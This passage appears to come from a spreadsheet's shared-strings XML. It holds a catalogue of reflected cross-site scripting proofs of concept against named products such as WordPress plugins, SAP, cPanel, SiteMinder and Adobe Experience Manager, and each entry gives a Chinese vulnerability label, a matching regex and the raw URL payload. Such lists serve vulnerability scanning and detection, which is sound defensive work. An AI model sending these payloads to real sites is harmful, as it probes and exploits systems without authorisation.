    <t>.*?(?:/OA_HTML/ieuiMeetingErrorDisplay\.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert\('\{\{randstr\}\}'\)%3E|/OA_HTML/oksAutoRenewalHelp\.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert\('\{\{randstr\}\}'\)%3E|/OA_HTML/jtfLOVInProcess\.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert\('\{\{randstr\}\}'\)%3E).*</t>
  </si>
  <si>
    <t>/OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E|/OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E|/OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E</t>
  </si>
  <si>
    <t>Php</t>
  </si>
  <si>
    <t>Php_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/login\.php/'%3E%3Csvg/onload=alert%60\{\{randstr\}\}%60%3E|/login\.php/'%3E%3Csvg/onload=confirm%60xss%60%3E).*</t>
  </si>
  <si>
    <t>/login.php/'%3E%3Csvg/onload=alert%60{{randstr}}%60%3E|/login.php/'%3E%3Csvg/onload=confirm%60xss%60%3E</t>
  </si>
  <si>
    <t>Qcubed</t>
  </si>
  <si>
    <t>Qcubed_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/qcubed/assets/php/_devtools/installer/step_2\.php\?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E|/assets/php/_devtools/installer/step_2\.php\?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E).*</t>
  </si>
  <si>
    <t>/qcubed/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E|/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E</t>
  </si>
  <si>
    <t>Reflective</t>
  </si>
  <si>
    <t>Reflective_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/rails/actions\?error=ActiveRecord::PendingMigrationError\&amp;action=Run%20pending%20migrations\&amp;location=%0djavascript:alert\(1\)//%0aaaaaa).*</t>
  </si>
  <si>
    <t>Sap</t>
  </si>
  <si>
    <t>Sap_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/sap\(bD1ydSZjPTAwMA==\)/public/bsp/sap/system_public/logon\.htm\?logonUrl=javascrip%09T:alert\(document\.domain\)).*</t>
  </si>
  <si>
    <t>/sap(bD1ydSZjPTAwMA==)/public/bsp/sap/system_public/logon.htm?logonUrl=javascrip%09T:alert(document.domain)</t>
  </si>
  <si>
    <t>sap_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>Sick</t>
  </si>
  <si>
    <t>Sick_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/config/postProcessing/testNaming\?pattern=%3Csvg/onload=alert\(document\.domain\)%3E).*</t>
  </si>
  <si>
    <t>/config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E</t>
  </si>
  <si>
    <t>Siteminder</t>
  </si>
  <si>
    <t>Siteminder_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/siteminderagent/forms/smaceauth\.fcc\?USERNAME=\\u003cimg\\u0020src\\u003dx\\u0020onerror\\u003d\\u0022confirm\(document\.domain\)\\u0022\\u003e\&amp;SMAUTHREASON=7|/siteminderagent/forms/smpwservices\.fcc\?USERNAME=\\u003cimg\\u0020src\\u003dx\\u0020onerror\\u003d\\u0022confirm\(document\.domain\)\\u0022\\u003e\&amp;SMAUTHREASON=7).*</t>
  </si>
  <si>
    <t>/siteminderagent/forms/smaceauth.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&amp;SMAUTHREASON=7|/siteminderagent/forms/smpwservices.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&amp;SMAUTHREASON=7</t>
  </si>
  <si>
    <t>Squirrelmail_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/vision/RMIServlet\?windowUnloading=\&amp;%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%56%2f%75%75%75%37%75%4e%66%37%4e%66%4e%31%2f%75%37%31%27%2f%4e%4f%4a%4d%2f%4e%4f%4a%4e%2f%75%75%2f%4a%54|/vision/RMIServlet\?windowUnloading=%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%56%2f%75%75%75%37%75%4e%66%37%4e%66%4e%31%2f%75%37%31%27%2f%4e%4f%4a%4d%2f%4e%4f%4a%4e%2f%75%75%2f%4a%54|/smartbi/vision/RMIServlet\?windowUnloading=%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%56%2f%75%75%75%37%75%4e%66%37%4e%66%4e%31%2f%75%37%31%27%2f%4e%4f%4a%4d%2f%4e%4f%4a%4e%2f%75%75%2f%4a%54|/smartbi/vision/RMIServlet\?windowUnloading=\&amp;%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%56%2f%75%75%75%37%75%4e%66%37%4e%66%4e%31%2f%75%37%31%27%2f%4e%4f%4a%4d%2f%4e%4f%4a%4e%2f%75%75%2f%4a%54).*</t>
  </si>
  <si>
    <t>/vision/RMIServlet?windowUnloading=&amp;%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%56%2f%75%75%75%37%75%4e%66%37%4e%66%4e%31%2f%75%37%31%27%2f%4e%4f%4a%4d%2f%4e%4f%4a%4e%2f%75%75%2f%4a%54|/vision/RMIServlet?windowUnloading=%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%56%2f%75%75%75%37%75%4e%66%37%4e%66%4e%31%2f%75%37%31%27%2f%4e%4f%4a%4d%2f%4e%4f%4a%4e%2f%75%75%2f%4a%54|/smartbi/vision/RMIServlet?windowUnloading=%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%56%2f%75%75%75%37%75%4e%66%37%4e%66%4e%31%2f%75%37%31%27%2f%4e%4f%4a%4d%2f%4e%4f%4a%4e%2f%75%75%2f%4a%54|/smartbi/vision/RMIServlet?windowUnloading=&amp;%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%56%2f%75%75%75%37%75%4e%66%37%4e%66%4e%31%2f%75%37%31%27%2f%4e%4f%4a%4d%2f%4e%4f%4a%4e%2f%75%75%2f%4a%54</t>
  </si>
  <si>
    <t>Swagger</t>
  </si>
  <si>
    <t>Swagger_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/dochelper\?userId=&lt;script&gt;alert\(\{\{randstr\}\}\)&lt;/script&gt;).*</t>
  </si>
  <si>
    <t>/dochelper?userId=&lt;script&gt;alert({{randstr}})&lt;/script&gt;</t>
  </si>
  <si>
    <t>Turbocrm</t>
  </si>
  <si>
    <t>Turbocrm_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/login/forgetpswd\.php\?loginsys=1\&amp;loginname=%22%3E%3Cscript%3Ealert\(document\.domain\)%3C/script%3E).*</t>
  </si>
  <si>
    <t>/login/forgetpswd.php?loginsys=1&amp;loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E</t>
  </si>
  <si>
    <t>Wems</t>
  </si>
  <si>
    <t>Wems_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/guest/users/forgotten\?email="&gt;&lt;script&gt;confirm\(document\.cookie\)&lt;/script&gt;).*</t>
  </si>
  <si>
    <t>/guest/users/forgotten?email="&gt;&lt;script&gt;confirm(document.cookie)&lt;/script&gt;</t>
  </si>
  <si>
    <t>.*?(?:/guest/users/forgotten\?email="&gt;&lt;script&gt;confirm\(document\.cookie\)&lt;/script&gt;|/guest/users/forgotten\?email=%22%3E%3Cscript%3Econfirm\(document\.domain\)%3C/script%3E).*</t>
  </si>
  <si>
    <t>/guest/users/forgotten?email="&gt;&lt;script&gt;confirm(document.cookie)&lt;/script&gt;|/guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E</t>
  </si>
  <si>
    <t>Wordfence</t>
  </si>
  <si>
    <t>Wordfence_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/\?s=ax6zt%2522%253e%253cscript%253ealert%2528document\.domain%2529%253c%252fscript%253ey6uu6).*</t>
  </si>
  <si>
    <t>/?s=ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6</t>
  </si>
  <si>
    <t>Wordpress</t>
  </si>
  <si>
    <t>Wordpress_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/admin\.php\?page=eshop\-templates\.php\&amp;eshoptemplate=%22%3E%3Cscript%3Ealert%28%2Fhello_topper%2f%29;%3C/script%3E|/wp\-admin/admin\.php\?page=eshop\-orders\.php\&amp;view=1\&amp;action=%22%3E%3Cscript%3Ealert%28%2Fhello_topper%2f%29;%3C/script%3E).*</t>
  </si>
  <si>
    <t>/wp-admin/admin.php?page=eshop-templates.php&amp;eshoptemplate=%22%3E%3Cscript%3Ealert%28%2Fhello_topper%2f%29;%3C/script%3E|/wp-admin/admin.php?page=eshop-orders.php&amp;view=1&amp;action=%22%3E%3Cscript%3Ealert%28%2Fhello_topper%2f%29;%3C/script%3E</t>
  </si>
  <si>
    <t>.*?(?:/wp\-login\.php\?wp_lang=%20=id=x\+type=image%20id=xss%20onfoc%3C!%3Eusin\+alert\(document\.domain\)%0c|/blog/wp\-login\.php\?wp_lang=en_US%27%22%20id=x%20tabindex=1%20onfocusin=alert\(document\.domain\)%3E|/wp\-login\.php\?wp_lang=en_US%27wp\-login\.php\?wp_lang=%20=id=x\+type=image%20id=xss%20onfoc%3C!%3Eusin&gt;|/wp/wp\-login\.php\?wp_lang=en_US%27%22%20id=x%20tabindex=1%20on%3C!%3Efocusin=alert\(document\.domain\)&gt;).*</t>
  </si>
  <si>
    <t>/wp-login.php?wp_lang=%20=id=x+type=image%20id=xss%20onfoc%3C!%3Eusin+alert(document.domain)%0c|/blog/wp-login.php?wp_lang=en_US%27%22%20id=x%20tabindex=1%20onfocusin=alert(document.domain)%3E|/wp-login.php?wp_lang=en_US%27wp-login.php?wp_lang=%20=id=x+type=image%20id=xss%20onfoc%3C!%3Eusin&gt;|/wp/wp-login.php?wp_lang=en_US%27%22%20id=x%20tabindex=1%20on%3C!%3Efocusin=alert(document.domain)&gt;</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/admin\.php\?page=elex\-product\-feed\-manage\&amp;search=%3C%2Fscript%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E).*</t>
  </si>
  <si>
    <t>/wp-admin/admin.php?page=elex-product-feed-manage&amp;search=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/admin\.php\?page=wpo_wcpdf_options_page\&amp;tab=documents\&amp;section=invoice\&amp;"&gt;&lt;script&gt;alert\(document\.domain\)&lt;/script&gt;).*</t>
  </si>
  <si>
    <t>/wp-admin/admin.php?page=wpo_wcpdf_options_page&amp;tab=documents&amp;section=invoice&amp;"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/admin\-ajax\.php\?action=zip_search\&amp;nonce=5ccfc183d6a\&amp;zip=10001\&amp;callback=jQuery370034739925402950467_1693440634785"%3E%3Cimg\ src=x\ onerror=alert\(1\)&gt;).*</t>
  </si>
  <si>
    <t>/wp-admin/admin-ajax.php?action=zip_search&amp;nonce=5ccfc183d6a&amp;zip=10001&amp;callback=jQuery370034739925402950467_1693440634785"%3E%3Cimg src=x onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/admin\.php\?page=feedwordpress%2Fsyndication\.php\&amp;visibility=%22%3E%3Cimg\+src%3D2\+onerror%3Dalert%28document\.domain%29%3E).*</t>
  </si>
  <si>
    <t>/wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&amp;visibility=%22%3E%3Cimg+src%3D2+onerror%3Dalert%28document.domain%29%3E</t>
  </si>
  <si>
    <t>.*?(?:/mobile\-app/v3/\?pid=77A89299\&amp;isMobile=%20clq95%22%3E%3Cscript%3Ealert\(document\.domain\)%3C/script%3Elb1ra).*</t>
  </si>
  <si>
    <t>/mobile-app/v3/?pid=77A89299&amp;isMobile=%20clq95%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Elb1ra</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/admin\.php\?page=age\-gate\&amp;a%22%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E).*</t>
  </si>
  <si>
    <t>/wp-admin/admin.php?page=age-gate&amp;a%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/admin\.php\?page=pmxe\-admin\-manage\&amp;a"&gt;&lt;script&gt;alert\(1\)&lt;/script&gt;).*</t>
  </si>
  <si>
    <t>/wp-admin/admin.php?page=pmxe-admin-manage&amp;a"&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>.*?(?:/forums/search/z\-\-&gt;%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E/).*</t>
  </si>
  <si>
    <t>/forums/search/z--&gt;%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E/</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/admin\.php\?page=gonzales\-wbcr_clearfy\&amp;action=index\&amp;wbcr_assets_manager=1\&amp;a"&gt;&lt;script&gt;alert\(1\)&lt;/script&gt;).*</t>
  </si>
  <si>
    <t>/wp-admin/admin.php?page=gonzales-wbcr_clearfy&amp;action=index&amp;wbcr_assets_manager=1&amp;a"&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/admin\.php\?page=wc\-reports\&amp;a"&gt;&lt;script&gt;alert\(1\)&lt;/script&gt;).*</t>
  </si>
  <si>
    <t>/wp-admin/admin.php?page=wc-reports&amp;a"&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/admin\-ajax\.php\?action=fetch_posts\&amp;stream\-id=1\&amp;hash=%3Cimg%20src=x%20onerror=alert\(document\.domain\)%3E).*</t>
  </si>
  <si>
    <t>/wp-admin/admin-ajax.php?action=fetch_posts&amp;stream-id=1&amp;hash=%3Cimg%20src=x%20onerror=alert(document.domain)%3E</t>
  </si>
  <si>
    <t>social_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/edit\.php\?post_type=modula\-gallery\&amp;page=modula\-addons\&amp;a"&gt;&lt;script&gt;alert\(1\)&lt;/script&gt;).*</t>
  </si>
  <si>
    <t>/wp-admin/edit.php?post_type=modula-gallery&amp;page=modula-addons&amp;a"&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/options\-general\.php\?page=my\-chatbot\&amp;tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E).*</t>
  </si>
  <si>
    <t>/wp-admin/options-general.php?page=my-chatbot&amp;tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/index\.php\?a%22%3E%3Cscript%3Ealert\(1\)%3C/script%3E).*</t>
  </si>
  <si>
    <t>/wp-admin/index.php?a%22%3E%3Cscript%3Ealert(1)%3C/script%3E</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/admin\.php\?page=rp4wp_link_related\&amp;rp4wp_parent=156x%27%22%3E%3Cimg\+src%3Dx\+onerror%3Dalert%28document\.domain%29%3E).*</t>
  </si>
  <si>
    <t>/wp-admin/admin.php?page=rp4wp_link_related&amp;rp4wp_parent=156x%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/options\-general\.php\?page=wp\-shortpixel\-settings\&amp;"&gt;&lt;script&gt;alert\(1\)&lt;/script&gt;).*</t>
  </si>
  <si>
    <t>/wp-admin/options-general.php?page=wp-shortpixel-settings&amp;"&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/edit\.php\?post_type=wbcr\-snippets\&amp;page=import\-wbcr_insert_php\&amp;a"&gt;&lt;script&gt;alert\(1\)&lt;/script&gt;).*</t>
  </si>
  <si>
    <t>/wp-admin/edit.php?post_type=wbcr-snippets&amp;page=import-wbcr_insert_php&amp;a"&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/admin\.php\?page=wptouch\-admin\-license\&amp;a%22%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E).*</t>
  </si>
  <si>
    <t>/wp-admin/admin.php?page=wptouch-admin-license&amp;a%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E</t>
  </si>
  <si>
    <t>.*?(?:/\?ct_keyword=%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document\.domain%29%3E\&amp;ct_city=0\&amp;ct_state=0\&amp;ct_zipcode=0\&amp;search\-listings=true\&amp;ct_property_type=0\&amp;ct_beds=0\&amp;ct_baths=0\&amp;ct_price_from\&amp;ct_price_to).*</t>
  </si>
  <si>
    <t>/?ct_keyword=%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.domain%29%3E&amp;ct_city=0&amp;ct_state=0&amp;ct_zipcode=0&amp;search-listings=true&amp;ct_property_type=0&amp;ct_beds=0&amp;ct_baths=0&amp;ct_price_from&amp;ct_price_to</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/authorize\-application\.php\?success_url=javascript%3Aalert%28document\.domain%29\&amp;reject_url=javascript%3Aalert%28document\.domain%29).*</t>
  </si>
  <si>
    <t>/wp-admin/authorize-application.php?success_url=javascript%3Aalert%28document.domain%29&amp;reject_url=javascript%3Aalert%28document.domain%29</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/admin\.php\?page=wc\-settings\&amp;tab=wooccm\&amp;section=advanced\&amp;"&gt;\-\-&gt;&lt;script&gt;alert\(1\)&lt;/script&gt;).*</t>
  </si>
  <si>
    <t>/wp-admin/admin.php?page=wc-settings&amp;tab=wooccm&amp;section=advanced&amp;"&gt;--&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/admin\.php\?page=jj4t3\-logs\&amp;a"&gt;&lt;script&gt;alert\(1\)&lt;/script&gt;).*</t>
  </si>
  <si>
    <t>/wp-admin/admin.php?page=jj4t3-logs&amp;a"&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/admin\.php\?page=snippets\&amp;tag=&lt;/script&gt;&lt;script&gt;alert\(document\.domain\)&lt;/script&gt;).*</t>
  </si>
  <si>
    <t>/wp-admin/admin.php?page=snippets&amp;tag=&lt;/script&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;</t>
  </si>
  <si>
    <t>Academy Learning Management System</t>
  </si>
  <si>
    <t>Academy Learning Management System_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/search\?query=%22%3E%3Cscript%3Ealert\(document\.domain\)%3C/script%3E).*</t>
  </si>
  <si>
    <t>/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E</t>
  </si>
  <si>
    <t>Adobe Coldfusion_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/cfusion/debug/cf_debugFr\.cfm\?userPage=javascript:alert\(1\)|/CFIDE/debug/cf_debugFr\.cfm\?userPage=javascript:alert\(1\)).*</t>
  </si>
  <si>
    <t>/cfusion/debug/cf_debugFr.cfm?userPage=javascript:alert(1)|/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(1)</t>
  </si>
  <si>
    <t>Adobe Experience Manager</t>
  </si>
  <si>
    <t>Adobe Experience Manager_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/etc/designs/xh1x\.childrenlist\.json//&lt;svg\ onload=alert\(document\.domain\)&gt;\.html|/crx/de/setPreferences\.jsp;%0A\.html\?language=en\&amp;keymap=&lt;svg/onload=confirm\(document\.domain\);&gt;//a|/content/crx/de/setPreferences\.jsp;%0A\.html\?language=en\&amp;keymap=&lt;svg/onload=confirm\(document\.domain\);&gt;//a).*</t>
  </si>
  <si>
    <t>/etc/designs/xh1x.childrenlist.json//&lt;svg onload=alert(document.domain)&gt;.html|/crx/de/setPreferences.jsp;%0A.html?language=en&amp;keymap=&lt;svg/onload=confirm(document.domain);&gt;//a|/content/crx/de/setPreferences.jsp;%0A.html?language=en&amp;keymap=&lt;svg/onload=confirm(document.domain);&gt;//a</t>
  </si>
  <si>
    <t>Aem Setpreferences</t>
  </si>
  <si>
    <t>Aem Setpreferences_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/dam/jcr:content/xxxxxxxxxxxx%27\\%22%3E%3Csvg/onload=alert\(1\)%3E\.childrenlist\.json\.json/ab\.html).*</t>
  </si>
  <si>
    <t>/dam/jcr:content/xxxxxxxxxxxx%27\%22%3E%3Csvg/onload=alert(1)%3E.childrenlist.json.json/ab.html</t>
  </si>
  <si>
    <t>Analytify 插件</t>
  </si>
  <si>
    <t>Analytify 插件_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/aa404bb\?a&lt;/script&gt;&lt;script&gt;alert\(/XSS/\)&lt;/script&gt;).*</t>
  </si>
  <si>
    <t>/aa404bb?a&lt;/script&gt;&lt;script&gt;alert(/XSS/)&lt;/script&gt;</t>
  </si>
  <si>
    <t>Avaya Aura Utility Services Administration</t>
  </si>
  <si>
    <t>Avaya Aura Utility Services Administration_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/acs/\.\.;/admin/public/login\.jsp\?error=%3Cscript%3Ealert\(document\.domain\)%3C/script%3e|/admin/public/login\.jsp\?error=%3Cscript%3Ealert\(document\.domain\)%3C/script%3e).*</t>
  </si>
  <si>
    <t>/acs/..;/admin/public/login.jsp?error=%3Cscript%3Ealert(document.domain)%3C/script%3e|/admin/public/login.jsp?error=%3Cscript%3Ealert(document.domain)%3C/script%3e</t>
  </si>
  <si>
    <t>Avaya Aura 公用服务管理平台</t>
  </si>
  <si>
    <t>Avaya Aura 公用服务管理平台_跨站脚本</t>
  </si>
  <si>
    <t>Axublog Go Index</t>
  </si>
  <si>
    <t>Axublog Go Index_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/go/index\.php\?u=&lt;/script&gt;&lt;script&gt;alert\('c4ca4238a0b923820dcc509a6f75849b'\)&lt;/script&gt;&lt;script&gt;).*</t>
  </si>
  <si>
    <t>/go/index.php?u=&lt;/script&gt;&lt;script&gt;alert('c4ca4238a0b923820dcc509a6f75849b')&lt;/script&gt;&lt;script&gt;</t>
  </si>
  <si>
    <t>Beyondtrust 远程支持</t>
  </si>
  <si>
    <t>Beyondtrust 远程支持_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/appliance/login\?login\[password\]=\{\{randstr\}\}%22%3E%3Csvg/onload=alert\(document\.domain\)%3E\&amp;login\[use_curr\]=1\&amp;login\[submit\]=Change%20Password).*</t>
  </si>
  <si>
    <t>/appliance/login?login[password]={{randstr}}%22%3E%3Csvg/onload=alert(document.domain)%3E&amp;login[use_curr]=1&amp;login[submit]=Change%20Password</t>
  </si>
  <si>
    <t>.*?(?:/bitrix/components/bitrix/photogallery_user/templates/\.default/galleries_recalc\.php\?AJAX=Y\&amp;arParams\[PERMISSION\]=W\&amp;arParams\[IBLOCK_ID\]=1%00%27\}\};alert\("METASCAN"\);if\(1\)\{//|/bitrix/components/bitrix/socialnetwork\.events_dyn/get_message_2\.php\?log_cnt=&lt;img%20onerror%E2%80%A9=alert\(document\.domain\)%20src=1&gt;%20METASCAN).*</t>
  </si>
  <si>
    <t>/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php?AJAX=Y&amp;arParams[PERMISSION]=W&amp;arParams[IBLOCK_ID]=1%00%27}};alert("METASCAN");if(1){//|/bitrix/components/bitrix/socialnetwork.events_dyn/get_message_2.php?log_cnt=&lt;img%20onerror%E2%80%A9=alert(document.domain)%20src=1&gt;%20METASCAN</t>
  </si>
  <si>
    <t>Bitrixsetup</t>
  </si>
  <si>
    <t>Bitrixsetup_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/bitrixsetup\.php\?action=UNPACK\&amp;filename=&lt;img\ src=''\ onerror=alert\(document\.domain\)&gt;).*</t>
  </si>
  <si>
    <t>/bitrixsetup.php?action=UNPACK&amp;filename=&lt;img src='' onerror=alert(document.domain)&gt;</t>
  </si>
  <si>
    <t>CMSEasy_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/\?movieName=%22\]%29\}catch%28e%29\{if%28!window\.x%29\{window\.x=1;alert\("test"\}\}).*</t>
  </si>
  <si>
    <t>/?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert("test"}}</t>
  </si>
  <si>
    <t>.*?(?:/bbs/index\.php/%27%2Balert\(e10adc3949ba59abbe56e057f20f883e\)%2B%27/\?case=file).*</t>
  </si>
  <si>
    <t>/bbs/index.php/%27%2Balert(e10adc3949ba59abbe56e057f20f883e)%2B%27/?case=file</t>
  </si>
  <si>
    <t>Copyparty_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/\?hc=%22%3E%3Cscript%3Ealert\(document\.domain\)%3C/script%3E).*</t>
  </si>
  <si>
    <t>/?hc=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E</t>
  </si>
  <si>
    <t>Cpanel</t>
  </si>
  <si>
    <t>Cpanel_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?::2082/cpanelwebcall/&lt;img%20src=x%20onerror="prompt\(1\)"&gt;aaaaaaaaaaaa|/cpanelwebcall/&lt;img%20src=x%20onerror="prompt\(1\)"&gt;aaaaaaaaaaaa|:2086/cpanelwebcall/&lt;img%20src=x%20onerror="prompt\(1\)"&gt;aaaaaaaaaaaa|:2083/cpanelwebcall/&lt;img%20src=x%20onerror="prompt\(1\)"&gt;aaaaaaaaaaaa).*</t>
  </si>
  <si>
    <t>:2082/cpanelwebcall/&lt;img%20src=x%20onerror="prompt(1)"&gt;aaaaaaaaaaaa|/cpanelwebcall/&lt;img%20src=x%20onerror="prompt(1)"&gt;aaaaaaaaaaaa|:2086/cpanelwebcall/&lt;img%20src=x%20onerror="prompt(1)"&gt;aaaaaaaaaaaa|:2083/cpanelwebcall/&lt;img%20src=x%20onerror="prompt(1)"&gt;aaaaaaaaaaaa</t>
  </si>
  <si>
    <t>.*?(?::2083/cpanelwebcall/&lt;img%20src=x%20onerror="prompt\(1\)"&gt;aaaaaaaaaaaa|:2082/cpanelwebcall/&lt;img%20src=x%20onerror="prompt\(1\)"&gt;aaaaaaaaaaaa|:2086/cpanelwebcall/&lt;img%20src=x%20onerror="prompt\(1\)"&gt;aaaaaaaaaaaa|/cpanelwebcall/&lt;img%20src=x%20onerror="prompt\(1\)"&gt;aaaaaaaaaaaa).*</t>
  </si>
  <si>
    <t>:2083/cpanelwebcall/&lt;img%20src=x%20onerror="prompt(1)"&gt;aaaaaaaaaaaa|:2082/cpanelwebcall/&lt;img%20src=x%20onerror="prompt(1)"&gt;aaaaaaaaaaaa|:2086/cpanelwebcall/&lt;img%20src=x%20onerror="prompt(1)"&gt;aaaaaaaaaaaa|/cpanelwebcall/&lt;img%20src=x%20onerror="prompt(1)"&gt;aaaaaaaaaaaa</t>
  </si>
  <si>
    <t>cpanel_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>DevalCMS</t>
  </si>
  <si>
    <t>DevalCMS_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?currentpath=%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E).*</t>
  </si>
  <si>
    <t>/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E</t>
  </si>
  <si>
    <t>DiscourseCMS</t>
  </si>
  <si>
    <t>DiscourseCMS_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/email/unsubscribed\?email=test@gmail\.com%27\\%22%3E%3Csvg/onload=alert\(/xss/\)%3E|/email/unsubscribed\?email=test@gmail\.com%27\\%22%3E%3Csvg/onload=alert\(xss\)%3E).*</t>
  </si>
  <si>
